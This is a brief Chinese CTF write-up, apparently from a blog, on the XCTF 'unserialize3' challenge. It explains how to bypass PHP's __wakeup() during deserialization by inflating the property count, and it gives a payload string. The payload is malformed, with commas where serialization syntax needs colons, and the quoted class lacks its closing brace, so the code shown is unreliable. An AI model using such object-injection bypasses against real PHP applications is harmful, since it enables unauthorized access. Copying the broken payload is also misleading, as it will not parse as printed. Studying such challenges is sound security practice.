xctf-unserialize3

2019-07-24  本文已影响0人  theLexical

给了我一段代码,php,_wakeup(),反序列化过程中,会调用这个wakeup。

先上代码:

class xctf{ 
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

所以要有反序列化的场景。代码给了提示:

属性数值>属性真实个数时,就会跳过执行__wakeup()函数
所以需要了解这几个魔术方法的特性。
此处的问题在于反序列化的内容是用户可控的。

所以,payload可以为O:4:"xctf",2,{s:4:"flag";s:3:"111";}

image.png
上一篇 下一篇

猜你喜欢

热点阅读